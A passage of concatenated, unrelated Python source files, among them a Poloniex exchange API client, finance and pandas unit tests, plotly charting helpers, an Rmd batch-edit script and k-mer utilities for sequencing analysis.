pd_signed = hmac.new(self.api_secret, post_data, hashlib.sha512).hexdigest()
headers = {
'Key' : self.api_key,
'Sign' : pd_signed
}
req = urllib2.Request(poloniex._trade_api_url, post_data, headers)
doc = urllib2.urlopen(req)
doc_txt = doc.read()
if (self.debug):
dump_file = open(dump_filename, 'w')
dump_file.write(doc_txt)
else:
doc = open(dump_filename, 'r')
doc_txt = doc.read()
result = json.loads(doc_txt)
except Exception as e:
print e
return result
def _public_api_query(self, command, params={}):
result = None
try:
dump_filename = poloniex._dump_file_prefix + command + '.json'
if not self.debug or not os.path.exists(dump_filename):
params['command'] = command
param_str = "?%s" % (urllib.urlencode(params))
doc = urllib2.urlopen(poloniex._public_api_url + param_str)
doc_txt = doc.read()
if (self.debug):
dump_file = open(dump_filename, 'w')
dump_file.write(doc_txt)
else:
doc = open(dump_filename, 'r')
doc_txt = doc.read()
result = json.loads(doc_txt)
except Exception as e:
print e
return result
# {
# "available": "0.23710790",
# "onOrders": "0.00000000",
# "btcValue": "0.23710790"
# }
class balance(object):
def __init__(self, balance_data=None):
self.balance = 0.0
self.on_order = 0.0
self.btc_value = 0.0
if balance_data:
self.balance = float(balance_data[u'available'])
self.on_order = float(balance_data[u'onOrders'])
self.btc_value = float(balance_data[u'btcValue'])
def __repr__(self):
return "balance: %.8f, on_order: %.8f, btc_value: %.8f" % (self.balance, self.on_order, self.btc_value)
def getBalances(self):
balances = None
balance_data = self._trade_api_query('returnCompleteBalances')
if balance_data != None:
balances = {}
for coin, data in balance_data.iteritems():
try:
balance = poloniex.balance(data)
if balance.balance > 0 or balance.on_order > 0:
balances[coin] = balance
except Exception as e:
print e
return balances
def getFeeInfo(self):
print self._trade_api_query('returnFeeInfo')
# {
# "id": 121,
# "last": "6956.95000023",
# "lowestAsk": "6959.00000000",
# "highestBid": "6956.95000026",
# "percentChange": "0.06212977",
# "baseVolume": "71544741.92528193",
# "quoteVolume": "10434.87960817",
# "isFrozen": "0",
# "high24hr": "7281.42800003",
# "low24hr": "6510.14948952"
# }
class market(object):
def __init__(self, currency_pair, currency_data):
self.id = int(currency_data[u'id'])
self.currency_pair = currency_pair
self.last_price = float(currency_data[u'last'])
def __repr__(self):
return "id: %d, currency_pair: %s, last_price: %.8f" % (self.id, self.currency_pair, self.last_price)
def getTicker(self):
ticker = None
try:
ticker_data = self._public_api_query('returnTicker')
if ticker_data:
ticker = {}
for curr_pair, curr_data in ticker_data.iteritems():
try:
mkt, curr = curr_pair.split('_', 2)
mkt_data = poloniex.market(curr_pair, curr_data)
while True:
try:
ticker[mkt][curr] = mkt_data
break
except:
ticker[mkt] = {}
except Exception as e:
print e
except Exception as e:
print "2", e
return ticker
class OrderBook(object):
def __init__(self):
self.bids = []
self.asks = []
def addAsk(self, price, amount):
self.asks.append((round(float(price), 8), round(float(amount), 8)))
def addBid(self, price, amount):
self.bids.append((round(float(price), 8), round(float(amount), 8)))
def getAsks(self):
return self.asks
def getBids(self):
return self.bids
def getOrderBook(self, currency_pair):
order_book = None
params = { u'currencyPair' : currency_pair }
order_book_data = self._public_api_query('returnOrderBook', params)
try:
err_str = order_book_data['error']
print err_str
except:
order_book = poloniex.OrderBook()
for ask in order_book_data[u'asks']:
order_book.addAsk(ask[0], ask[1])
for bid in order_book_data[u'bids']:
order_book.addBid(bid[0], bid[1])
return order_book
if __name__ == '__main__':
polo_key = ''
polo_secret = ''
coin_label = "Coin"
coin_len = len(coin_label)
bal_label = "Balance"
bal_len = len(bal_label)
order_label = "On Order"
order_len = len(order_label)
btc_label = "BTC Value"
btc_len = len(btc_label)
pct_label = "% Index"
pct_len = len(pct_label)
polo = poloniex(polo_key, polo_secret, debug=(1 == 0))
if False:
polo.getFeeInfo()
if False:
ob = polo.getOrderBook("BTC_ETH")
if ob:
print "Asks"
for price, amount in reversed(ob.getAsks()):
print "%11.8f %14.8f" % (price, amount)
print "Bids"
for price, amount in ob.getBids():
print "%11.8f %14.8f" % (price, amount)
print "Spread: %11.8f" % (ob.getAsks()[0][0] - ob.getBids()[0][0])
ob = polo.getOrderBook("ETH_BTC")
usdt_price = None
usdt_label = "USDT Value"
usdt_len = len(usdt_label)
try:
ticker = polo.getTicker()
usdt = ticker[u'USDT'][u'BTC']
usdt_price = usdt.last_price
print usdt_price
except Exception as e:
print e
pass
if (0 == 1) and ticker:
for mkt, currs in ticker.iteritems():
for curr, curr_data in currs.iteritems():
print mkt, curr, curr_data.id, "%.8f" % (curr_data.last_price)
if 0 == 0:
balances = polo.getBalances()
coins = []
btc_total = 0.0
if balances != None:
for coin, balance in balances.iteritems():
btc_total += balance.btc_value
try:
try:
btc_xchg = ticker[u'BTC'][coin].last_price
except Exception as e:
if u'BTC' == coin:
btc_xchg = 1.0
else:
raise e
btc_value = balance.balance * btc_xchg
except:
print coin, "using balance BTC value"
btc_value = balance.btc_value
coin_len = max(coin_len, len(coin))
bal_len = max(bal_len, len("%.8f" % (balance.balance)))
order_len = max(order_len, len("%.8f" % (balance.on_order)))
btc_len = max(btc_len, len("%.8f" % (btc_value)))
if usdt_price:
usdt_len = max(btc_len, len("%.2f" % (btc_value * usdt_price)))
coins.append((coin, balance.balance, balance.on_order, btc_value, 0.0 if not usdt_price else btc_value * usdt_price))
btc_len = max(btc_len, len("%.8f" % (btc_total)))
if usdt_price:
usdt_len = max(btc_len, len("%.2f" % (btc_total * usdt_price)))
if len(balances) > 0:
coins.sort(key=lambda coin: -coin[3])
print "%-*s %-*s %-*s %-*s %-*s %-*s" % (coin_len, coin_label, bal_len, bal_label, order_len, order_label, btc_len, btc_label, usdt_len, usdt_label, pct_len, pct_label)
for coin in coins:
print "%*s %*.8f %*.8f %*.8f %*.2f %*.2f%%" % (coin_len, coin[0], bal_len, coin[1], order_len, coin[2], btc_len, coin[3], usdt_len, coin[4], pct_len - 1, coin[3] / btc_total * 100.0)
print "%*s %*s %*s %*.8f %*.2f %*s" % (coin_len, '', bal_len, '', order_len, '', btc_len, btc_total, usdt_len, 0.0 if not usdt_price else btc_total * usdt_price, pct_len - 1, '')
|
StarcoderdataPython
|
1674271
|
import unittest
from tests import StockMapStub
from stockpy.metrics.finance import roe
from stockpy import expr
from stockpy.filter import horse
class RoeTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = {
'n_income_attr_p': {
2019: {
1: 2,
3: 53413057.75
},
2018: {
1: 4,
2: 5,
3: 7,
4: 58366455.95,
},
2017: {
4: 42248863.96,
},
2016: {
4: 32708951.81,
},
2015: {
4: 18219460.42,
},
2014: {
4: 18906255.13,
},
2013: {
4: 14239832.62,
}
},
'total_hldr_eqy_exc_min_int': {
2019: {
1: 318311778.58,
3: 357482918.8
},
2018: {
1: 4,
2: 5,
3: 7,
4: 319545061.05,
},
2017: {
4: 192981208.87,
},
2016: {
4: 162728344.91,
},
2015: {
4: 23332404.42,
},
2014: {
4: 96162944.0,
},
2013: {
4: 77256688.87,
},
2012: {
4: 123016856.25,
}
},
}
cls.stock = StockMapStub(data)
def test_roe_y(self):
m = roe.roe_y()
        # n_income_attr_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4)
# +total_hldr_eqy_exc_min_int(2019.1))
# /2)
def run(y, q):
v = m.expr.eval(self.stock, y, 4)
s1 = expr.Get('n_income_attr_p').eval(self.stock, y, q)
s2 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, y, q)
s3 = expr.Get('total_hldr_eqy_exc_min_int').eval(
self.stock, y-1, q)
a = s1/((s2+s3)/2)
print(y, q, a, v)
self.assertEqual(a, v, '{} {}'.format(y, q))
run(2018, 4)
run(2017, 4) # 42248863.96/((192981208.87+162728344.91)/2)
run(2016, 4)
run(2015, 4)
run(2014, 4)
run(2013, 4)
def test_range_roe(self):
        # n_income_attr_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4)
# +total_hldr_eqy_exc_min_int(2019.1))
# /2)
def run(y, q):
rm = expr.Range(expr.Before(expr.Get('f_roe_y'), past_year=1),
year_count=6)
nm = self.roe_ge_15_pct_now()
v = rm.eval(self.stock, y, 4)
v2 = expr.Ge(rm, expr.Value(0.15)).eval(self.stock, y, 4)
print('last 6 years', v, v2)
v3 = nm.eval(self.stock, y, q)
print('current', v3, expr.Get('f_roe').eval(self.stock, y, q))
v4 = expr.And(expr.Ge(rm, expr.Value(0.15)),
nm).eval(self.stock, y, q)
print('last 7 years', v4)
run(2019, 3)
m = horse.roe_ge_15_pct_last_7_year()
v = m.eval(self.stock, 2019, 3)
print('last 7 years 2', v)
def roe_ge_15_pct_now(self):
def fv(stock: expr.ExprCtx, year: int, quarter: int):
v = {
4: 0.15,
3: 0.15/4*3,
2: 0.15/4*2,
1: 0.15/4,
}
return v[quarter]
return expr.Ge(
expr.Get('f_roe'),
expr.FuncValue(fv)
)
def test_roe_ttm(self):
m = roe.roe_ttm()
        # n_income_attr_p(2019.1) / ((total_hldr_eqy_exc_min_int(2018.4)
# +total_hldr_eqy_exc_min_int(2019.1))
# /2)
v = m.expr.eval(self.stock, 2019, 1)
s1 = expr.Get('f_income_attr_p_ttm').eval(self.stock, 2019, 1)
s2 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, 2019, 1)
s3 = expr.Get('total_hldr_eqy_exc_min_int').eval(self.stock, 2018, 1)
self.assertEqual(s1/(s2+s3)*2, v)
|
StarcoderdataPython
|
3289706
|
<reponame>serrabaum/Python-Baseball
import pytest
import matplotlib
matplotlib.use('Agg')
from .utils import get_assignments, get_calls
from stats import offense
@pytest.mark.test_select_all_plays_module4
def test_select_all_plays_module4():
assert 'games' in dir(offense), 'Have you imported `games` from `data`?'
assert 'plays:games:games:type:play' in get_assignments(offense), 'Select the `play` rows of the `games` DataFrame.'
assert 'plays:columns:type:inning:team:player:count:pitches:event:game_id:year' in get_assignments(offense), 'Set the correct column labels of the `games` DataFrame.'
@pytest.mark.test_select_only_hits_module4
def test_select_only_hits_module4():
assert 'hits:plays:loc:plays:event:str:contains:^(?:S(?!B)|D|T|HR):inning:event' in get_assignments(offense), 'Refine the `games` DataFrame to contain only hits. Store the new DataFrame in a variable called `hits`.'
@pytest.mark.test_convert_column_type_module4
def test_convert_column_type_module4():
assert 'hits:loc:None:None:None:inning:pd:to_numeric:hits:loc:None:None:None:inning' in get_assignments(offense), 'Change the data type of the `inning` column to numeric.'
@pytest.mark.test_replace_dictionary_module4
def test_replace_dictionary_module4():
assert 'replacements:^S(.*):^D(.*):^T(.*):^HR(.*):single:double:triple:hr' in get_assignments(offense), '`replacements` is not a dictionary, doesn\'t exist, or contains the wrong values.'
@pytest.mark.test_replace_function_module4
def test_replace_function_module4():
assert 'hit_type:hits:event:replace:replacements:regex:True' in get_assignments(offense), 'The `replace()` function is not used to replace the event column with the correct hit type.'
@pytest.mark.test_add_a_new_column_module4
def test_add_a_new_column_module4():
assert 'hits:hits:assign:hit_type:hit_type' in get_assignments(offense), 'The new `hit_type` column has not been assign to the `hits` DataFrame.'
@pytest.mark.test_group_by_inning_and_hit_type_module4
def test_group_by_inning_and_hit_type_module4():
assert 'hits:hits:groupby:inning:hit_type:size:reset_index:name:count' in get_assignments(offense), 'The `hits` DataFrame is not properly grouped.'
@pytest.mark.test_convert_hit_type_to_categorical_module4
def test_convert_hit_type_to_categorical_module4():
assert 'hits:hit_type:pd:Categorical:hits:hit_type:single:double:triple:hr' in get_assignments(offense), 'The `hit_type` column is not `Categorical`.'
@pytest.mark.test_sort_values_module4
def test_sort_values_module4():
assert 'hits:hits:sort_values:inning:hit_type' in get_assignments(offense), 'The `hits` DataFrame has not been sorted by `inning`.'
@pytest.mark.test_reshape_with_pivot_module4
def test_reshape_with_pivot_module4():
pivot = False
index = False
columns = False
values = False
for string in get_assignments(offense):
if 'hits:hits:pivot' in string:
pivot = True
if 'index:inning' in string:
index = True
if 'columns:hit_type' in string:
columns = True
if 'values:count' in string:
values = True
assert pivot, 'Are you calling `pivot()` on the `hits` DataFrame?'
assert index, 'Does the call to `pivot()` have a keyword argument of `index` set to `\'inning\'`?'
assert columns, 'Does the call to `pivot()` have a keyword argument of `columns` set to `\'strike_outs\'`?'
assert values, 'Does the call to `pivot()` have a keyword argument of `values` set to `\'count\'`?'
@pytest.mark.test_stacked_bar_plot_module4
def test_stacked_bar_plot_module4():
assert 'hits:plot:bar:stacked:True' in get_calls(offense), 'A stacked bar chart has not been plotted.'
assert 'plt:show' in get_calls(offense), 'The plot has not been shown.'
|
StarcoderdataPython
|
1638475
|
def get_config_file():
import os
path = os.path.abspath(__file__)
f = os.path.join(os.path.dirname(path), 'setup.cfg.tpl')
return open(f).read()
|
StarcoderdataPython
|
3264852
|
<reponame>figtools/figgy-cli<filename>src/figcli/extras/key_utils.py
import re
from typing import Set, Dict
from figcli.config import *
class KeyUtils(object):
@staticmethod
def find_all_expected_names(config_keys: set, shared_names: set, merge_conf: dict,
repl_conf: dict, repl_from_conf: dict, namespace: str) -> Set[str]:
"""
From various sets of keys and configs, calculates all required PS Names (keys) this application requires.
Args:
config_keys: set -> representing the app_figs in the passed in figgy.json file
shared_names: set -> representing the shared_figs in the passed in figgy.json file
merge_conf: dict -> representing the merged_figs in the passed in figgy.json file
repl_conf: dict -> representing the replicate_figs in the figgy.json file
repl_from_conf: dict -> represents the `replicate_from` config block in the figgy.json file
namespace: parsed, or calculated namespace for the application being synced. E.G. /app/demo-time/
Returns: Set[str] -> All PS Names that have been defined as dependencies for this application's deployment
"""
merge_keys = set(merge_conf.keys())
all_keys = config_keys | shared_names | merge_keys
for merge_key, merge_val in merge_conf.items():
if type(merge_val) == list:
for val in merge_val:
if KeyUtils.sanitize(val).startswith(namespace):
all_keys.add(KeyUtils.sanitize(val))
elif type(merge_val) == str:
matches = re.findall('\${([\w/-]+)}', merge_val)
for match in matches:
if match.startswith(namespace):
all_keys.add(KeyUtils.sanitize(match))
for key in repl_conf:
all_keys.add(repl_conf[key])
source_ns = repl_from_conf.get(SOURCE_NS_KEY)
params = repl_from_conf.get(PARAMETERS_KEY)
if source_ns and params:
for param in params:
all_keys.add(f'{namespace}{param}')
return all_keys
@staticmethod
def merge_repl_and_repl_from_blocks(repl_conf: Dict, repl_from: Dict, dest_namespace: str) -> Dict:
"""
Parses the repl_from block and merges it into the standard 'replication' block. This simplifies
configuring replication and detecting strays.
Args:
repl_conf: Dict representing the `replicate_figs` block in figgy.json file
            repl_from: Dict representing the `replicate_from` block in figgy.json file
            dest_namespace: namespace found in the `figgy.json` file. Where replication is destined for.
        Returns: an updated repl_conf dictionary with repl_from configs merged into it.
"""
source_ns = repl_from.get(SOURCE_NS_KEY)
params = repl_from.get(PARAMETERS_KEY)
dest_namespace = dest_namespace if dest_namespace.endswith('/') else f'{dest_namespace}/'
if source_ns and params:
source_ns = source_ns if source_ns.endswith('/') else f'{source_ns}/'
for param in params:
repl_conf[f'{source_ns}{param}'] = f'{dest_namespace}{param}'
return repl_conf
@staticmethod
def sanitize(merge_val):
return merge_val.replace("${", "").replace("}", "").replace(merge_uri_suffix, "")
@staticmethod
def desanitize(merge_val):
return "${" + merge_val + "}"
|
StarcoderdataPython
|
3381939
|
<filename>src/analyticViz/viz.py
import plotly.express as px
import plotly.figure_factory as ff
"""
This is a script that contains functions needed for plotting various visualizations using plotly
The various visualizations include:
* Bar Chart (Horizontal)
* Bar Chart (Vertical)
* Stacked bar chart
* Clustered bar chart
* Pie Chart
* Histogram
* Box plots
* Facet row plots
* Sunburst
* Violin Plot
"""
def Vbar(data, x_col, y_col, text, title=None, x_title=None, y_title=None, color=None, mode=None):
"""
Function that plots a vertical bar chart
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe to be plotted on the x-axis
y_col: str - column in the dataframe to be plotted on the y-axis
text: str - column name to be used as text display on the bar chart
        title: str - text to be displayed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name that you want stacked
mode: str - indicate whether stacked or group(side by side plot)
Returns:
fig: plot - bar plot to be displayed
"""
# plot bar chart
fig = px.bar(data, x=x_col, y=y_col, text=text, color=color, barmode=mode, color_discrete_sequence=px.colors.qualitative.D3)
# edit contents of bar chart
fig.update_traces(texttemplate='%{text:.1s}', textposition='outside', cliponaxis=False,
textfont={'family':"Arial",'size': 13,'color': "black"})
# edit outline of bar chart
fig.update_xaxes(title_text=x_title, automargin=True, categoryorder='total ascending', type='category')
fig.update_yaxes(title_text=y_title, automargin=True)
fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.5,uniformtext_minsize=5)
return fig.show()
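# Editor-added usage sketch for Vbar; the dataframe and column names below are hypothetical,
# not taken from any dataset shipped with this script:
#
#   import pandas as pd
#   df = pd.DataFrame({'city': ['Accra', 'Kumasi', 'Tamale'], 'sales': [120, 95, 60]})
#   Vbar(df, x_col='city', y_col='sales', text='sales', title='Sales by city')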
def Hbar(data, x_col, y_col, text, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None):
"""
Function that plots a horizontal bar chart
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe to be plotted on the x-axis
y_col: str - column in the dataframe to be plotted on the y-axis
text: str - column name to be used as text display on the bar chart
        title: str - text to be displayed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name that you want stacked
Returns:
fig: plot - bar plot to be displayed
"""
# plot bar chart
fig = px.bar(data, x=x_col, y=y_col, text=text, orientation='h', color=color,
facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3)
# edit contents of bar chart
fig.update_traces(texttemplate='%{text:.1s}', textposition='outside', cliponaxis=False,
textfont={'family':"Arial",'size': 13,'color': "black"})
# edit outline of bar chart
fig.update_xaxes(title_text=x_title, automargin=True)
fig.update_yaxes(title_text=y_title, automargin=True, categoryorder='total ascending', type='category')
fig.update_layout(title_text=title, xaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.5, uniformtext_minsize=5)
return fig.show()
def pie(data, values, labels, title=None):
"""
Function that plots a pie chart
Args:
data: dataframe - pandas dataframe
values: str - column in the dataframe representing numeric values
labels: str - column in the dataframe representing categorical values
        title: str - text to be displayed as title for the plot
Returns:
fig: plot - pie chart to be displayed
"""
# plot pie chart
fig = px.pie(data, values=values, names=labels, title=title, hole=0.6, color_discrete_sequence=px.colors.qualitative.D3)
# edit pie chart
fig.update_traces(hoverinfo='label+value', textfont_size=12, marker=dict(line=dict(color='#000000', width=0.5)))
fig.update_layout(autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5)
return fig.show()
def hist(data, x_col, title, plot_type, color=None, f_col=None, f_row=None):
"""
Function that plots a histogram
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing numeric values
        title: str - text to be displayed as title for the plot
        plot_type: str - indicates which additional plot you need (box, violin, rug)
color: str - column name to be used for multiple histograms
Returns:
fig: plot - histogram to be displayed
"""
# plot graph
fig = px.histogram(data, x=x_col, marginal=plot_type, color=color, hover_data=data.columns,
facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3)
# update or edit graph
fig.update_layout(autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5,
yaxis=dict(visible=False), title_text = title)
return fig.show()
def scatter(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, size=None, render=None, f_col=None, f_row=None):
"""
Function that plots a scatter plot
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing numeric values
y_col: str - column in the dataframe representing numeric values
        title: str - text to be displayed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
size: str - column name to size points with
color: str - column name to be used for multiple histograms
render: str - how to render the viz (webgl or svg)
Returns:
fig: plot - histogram to be displayed
"""
# plot graph
fig = px.scatter(data, x=x_col, y=y_col, color=color, size=size, render_mode=render,
facet_col=f_col, facet_row=f_row, color_discrete_sequence=px.colors.qualitative.D3)
# edit graph
fig.update_xaxes(title_text=x_title, automargin=True)
fig.update_yaxes(title_text=y_title, automargin=True)
fig.update_traces(marker=dict(line=dict(width=1.5, color='DarkSlateGrey')), selector=dict(mode='markers'))
fig.update_layout(title_text=title, autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.5, uniformtext_minsize=5)
return fig.show()
def line(data, x_col, y_col, x_title=None, y_title=None, title=None, color=None, f_col=None, f_row=None):
"""
Function that plots a line charts
Args:
data: dataframe - pandas dataframe
        x_col: str - column in the dataframe representing date values (year, month, day, week, date, datetime)
        y_col: str - column in the dataframe representing numeric values
        title: str - text to be displayed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name to be used for multiple line plots
Returns:
fig: plot - line plot to be displayed
"""
# plot line chart
fig = px.line(data, x=x_col, y=y_col, color=color, markers=True, facet_col=f_col, facet_row=f_row,
color_discrete_sequence=px.colors.qualitative.D3)
# edit line chart
fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.5, uniformtext_minsize=5)
return fig.show()
def sun(data, path, value, title=None):
"""
Function that plots a sunburst chart(pie)
Args:
data: dataframe - pandas dataframe
value: str - column in the dataframe representing numeric values
path: list - list of column names in the dataframe representing categorical values
        title: str - text to be displayed as title for the plot
Returns:
fig: plot - sunburst chart to be displayed
"""
# plot chart
fig = px.sunburst(data, path=path, values=value, color_discrete_sequence=px.colors.qualitative.D3)
#edit chart
fig.update_traces(hoverinfo='label+value', textfont_size=12, marker=dict(line=dict(color='#000000', width=0.5)))
fig.update_layout(title_text=title, autosize=False, plot_bgcolor='rgba(0,0,0,0)', title_x=0.46, uniformtext_minsize=5)
return fig.show()
def table(data, index=None):
"""
Function that converts pandas dataframe to plotly dataframe
Args:
data: dataframe - pandas dataframe
index: bool - indicates if you want index to show or not
Returns:
fig: plot - formatted plotly table
"""
# plot table
colorscale = [[0, '#1779bd'],[.5, '#d2e8f7'],[1, '#ffffff']]
fig = ff.create_table(data, index=index, colorscale=colorscale)
return fig.show()
def box(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None):
"""
Function that plots a box plot
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing categorical values
y_col: str - column in the dataframe representing numerical values
        title: str - text to be displayed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name to be used for multiple box plots
Returns:
fig: plot - box plot to be displayed
"""
# plot box plot
fig = px.box(data, x=x_col, y=y_col, color=color, color_discrete_sequence=px.colors.qualitative.D3, notched=True,
facet_col=f_col, facet_row=f_row)
# edit plot
fig.update_xaxes(title_text=x_title, automargin=True)
fig.update_yaxes(title_text=y_title, automargin=True)
fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.46, uniformtext_minsize=5)
return fig.show()
def violin(data, x_col, y_col, title=None, x_title=None, y_title=None, color=None, f_col=None, f_row=None):
"""
Function that plots a violin plot
Args:
data: dataframe - pandas dataframe
x_col: str - column in the dataframe representing categorical values
y_col: str - column in the dataframe representing numerical values
        title: str - text to be displayed as title for the plot
x_title: str - text to be displayed on the x-axis
y_title: str - text to be displayed on the y-axis
color: str - column name to be used for multiple box plots
Returns:
fig: plot - violin plot to be displayed
"""
# plot box plot
fig = px.violin(data, x=x_col, y=y_col, color=color, color_discrete_sequence=px.colors.qualitative.D3, box=True,
facet_col=f_col, facet_row=f_row)
# edit plot
fig.update_xaxes(title_text=x_title, automargin=True)
fig.update_yaxes(title_text=y_title, automargin=True)
fig.update_layout(title_text=title, yaxis=dict(visible=False), autosize=False, plot_bgcolor='rgba(0,0,0,0)',
title_x=0.46, uniformtext_minsize=5)
return fig.show()
|
StarcoderdataPython
|
3270810
|
def parse_relationship(string):
"""Parses relationship from string of format A)B where A is the parent and
B is the child.
Args:
original string
Returns:
Parent, Child: string, string
"""
parsed = string.strip().split(')')
return parsed[0], parsed[1]
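# Editor-added example: parse_relationship('COM)B') returns ('COM', 'B'),
# i.e. B orbits (is a child of) COM.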
def get_input_str(filename):
"""returns list of inputs from data file.
Args:
filename: the name of the file with the input data.
Returns:
a list of strings read from the file
"""
text_file = open(filename, "r")
input_strs = text_file.readlines()
text_file.close()
return input_strs
class Planet:
"""A planet - linked list - with name, parent, children, and count of the
number of planets it orbits (that come between it and the base planet)
"""
def __init__(self, name, parent=None):
self.name = name
self.parent = parent
self.count = None
self.children = []
def set_count(self):
if self.parent != None:
self.count = self.parent.count +1
else:
self.count = 0
def set_parent(self, parent):
self.parent = parent
def add_child(self, child):
self.children.append(child)
def build_tree(instructions):
"""builds a tree based on the instructions passed. Instructions expected to
be a list of strings in the form parent)child.
"""
first_name, _ = parse_relationship(instructions[0])
first_planet = Planet(name=first_name, parent=None)
planets = [first_planet]
for instruction in instructions:
parent_name, child_name = parse_relationship(instruction)
# initialize next_planet and parent
next_planet = None
parent = None
# search for existing planet or parent
for planet in planets:
if planet.name == parent_name:
parent = planet
elif planet.name == child_name:
next_planet = planet
# if no existing planet or parent, make them, and add to planet list
if parent == None:
parent = Planet(name=parent_name)
planets.append(parent)
if next_planet == None:
next_planet = Planet(name=child_name)
planets.append(next_planet)
# add parent to the next planet
next_planet.set_parent(parent)
# add next planet to parent's children
parent.add_child(next_planet)
return planets
def set_orbit_counts(planets):
"""sets the orbit counts by finding base planet and traversing the tree,
setting the counts from root to leaf.
"""
base_planet = None
# find base planet
for planet in planets:
if planet.parent == None:
base_planet = planet
break
# traverse tree setting count
base_planet.set_count()
planet = base_planet
s = []
s.append(planet)
while len(s) > 0:
planet = s.pop()
planet.set_count()
if planet.children != None:
for child in planet.children:
s.append(child)
def count_orbits(planets):
"""counts(sums) the number of orbits from all planets
"""
set_orbit_counts(planets)
count = 0
for planet in planets:
count += planet.count
return count
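# Editor-added sanity check on a tiny, made-up map (input format 'parent)child'):
#
#   planets = build_tree(['COM)B', 'B)C', 'C)D'])
#   count_orbits(planets)   # -> 6   (B orbits 1 planet, C orbits 2, D orbits 3)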
def main():
lines = get_input_str('day6_input.txt')
planets = build_tree(lines)
print(count_orbits(planets))
def t(lines):
"""test build_tree and count_orbits without reading text file
"""
planets = build_tree(lines)
return count_orbits(planets)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
3392859
|
# coding: utf-8
# How to use:
# type 'ipython' at the terminal to get to the Interactive Python (IPython) environments
# Type:
# %run batch_replace_rmd.py
import re
methods = 'facs', 'droplet'
for method in methods:
rmds = get_ipython().getoutput(f'ls *{method}.Rmd')
for rmd in rmds:
backup = rmd + '.backup'
get_ipython().system(' cp $rmd $backup')
replaced = rmd + '.replaced'
print(replaced)
batch_name = 'channel' if method == 'droplet' else 'plate.barcode'
with open(rmd) as f:
content = f.read()
content = content.replace(f"""filename = here('00_data_ingest', '03_tissue_annotation_csv',
paste0(tissue_of_interest, "_{method}_annotation.csv"))
write.csv(<EMAIL>[,c('{batch_name},'cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename)
""",
f"""
filename = here('00_data_ingest', '03_tissue_annotation_csv',
paste0(tissue_of_interest, "_{method}_annotation.csv"))
write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename)
"""
)
content = content.replace(f"""filename = here('00_data_ingest', '03_tissue_annotation_csv',
paste0(tissue_of_interest, "_{method}_annotation.csv"))
write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation')], file=filename)
""",
f"""filename = here('00_data_ingest', '03_tissue_annotation_csv',
paste0(tissue_of_interest, "_{method}_annotation.csv"))
write.csv(<EMAIL>[,c('{batch_name}','cell_ontology_class','cell_ontology_id', 'free.annotation', 'cluster.ids')], file=filename)
"""
)
# print(content)
# content = content.replace("""tissue_of_interest = "Bladder"
# tiss <- ScaleData(object = tiss, vars.to.regress = c("nUMI", "percent.ribo","Rn45s"))""", """tiss <- NormalizeData(object = tiss)
# tiss <- ScaleData(object = tiss)""")
with open(replaced, 'w') as g:
g.write(content)
# get_ipython().system(f'diff Bladder_{method}.Rmd Bladder_{method}.Rmd.replaced')
get_ipython().system(f'diff Lung_{method}.Rmd Lung_{method}.Rmd.replaced')
replaceds = get_ipython().getoutput('ls *.Rmd.replaced')
for replaced in replaceds:
rmd = replaced.split('.replaced')[0]
print(rmd)
get_ipython().system(' mv $replaced $rmd')
|
StarcoderdataPython
|
3223573
|
<reponame>borisz264/mono_seq
import os
import operator
import itertools
import gzip
import numpy as np
from scipy import stats
def old_chris_formula(R, k, read_len):
"""
Implements the formula Chris burge derived
"""
return (4 ** k -1) * ( R * (read_len - k + 1) - (read_len - k) ) / (4 ** k + read_len - k - (R *(read_len - k +1)))
def chris_formula(R, k, read_len):
"""
Implements the formula Chris burge derived
"""
return (4. ** k - 1) * (read_len - k +1 ) * (R - 1) / (4. ** k -R * (read_len -k +1))
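# Editor-added sanity checks, with illustrative values only: when R == 1 the (R - 1) factor
# makes chris_formula(1, k, read_len) == 0 for any k and read length, and for example
# chris_formula(2, 6, 40) == (4**6 - 1) * 35 * 1 / (4**6 - 2 * 35) ~= 35.6.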
def get_adjacent_kmers(kmer):
"""
returns all the k+1 mers that contain the kmer
"""
return ['A' + kmer, 'C' + kmer, 'G' + kmer, 'T' + kmer,
kmer + 'A', kmer + 'C', kmer + 'G', kmer + 'T']
def iter_RNAfold_output(energy_file):
"""
iterates through RNAfold input and returns an energy iterator
"""
for l1, l2 in iterLinePairs(energy_file):
yield float(l2.split(' (')[1].replace(')', ''))
def iterLinePairs(inFile):
for l1, l2 in iterNlines(inFile, 2):
